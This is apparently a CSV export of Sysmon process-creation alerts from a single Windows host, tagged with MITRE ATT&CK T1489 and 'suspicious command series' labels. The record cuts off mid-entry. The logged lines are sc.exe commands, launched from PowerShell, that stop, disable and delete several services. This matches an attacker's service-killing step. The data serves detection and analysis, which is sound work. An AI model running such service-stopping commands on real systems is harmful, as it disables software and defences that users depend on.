ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.846668800Z"",""eventRecordID"":""3282"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.843\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00102f992b00}\r\nProcessId: 8124\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.843"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-00102f992b00}"",""processId"":""8124"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.127",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.796 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010be952b00} +ProcessId: 300 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.799268700Z"",""eventRecordID"":""3279"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.796\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010be952b00}\r\nProcessId: 300\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.796"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010be952b00}"",""processId"":""300"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.071",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.744 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010af922b00} +ProcessId: 8076 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.747171100Z"",""eventRecordID"":""3276"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.744\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010af922b00}\r\nProcessId: 8076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:32.744"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010af922b00}"",""processId"":""8076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.052",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.717 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001069912b00} +ProcessId: 5664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHasdadelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHasdadelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.720243500Z"",""eventRecordID"":""3275"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.717\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001069912b00}\r\nProcessId: 5664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHasdadelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.717"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-001069912b00}"",""processId"":""5664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHasdadelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.016",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.684 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010688f2b00} +ProcessId: 3548 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 
WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.687294600Z"",""eventRecordID"":""3273"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.684\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010688f2b00}\r\nProcessId: 3548\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.684"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010688f2b00}"",""processId"":""3548"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.946",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.630 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010438c2b00} +ProcessId: 7876 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.632625800Z"",""eventRecordID"":""3270"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.630\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010438c2b00}\r\nProcessId: 7876\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.630"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010438c2b00}"",""processId"":""7876"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.903",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process 
Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.531 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001003892b00} +ProcessId: 2356 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.540864400Z"",""eventRecordID"":""3268"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.531\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001003892b00}\r\nProcessId: 2356\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: 
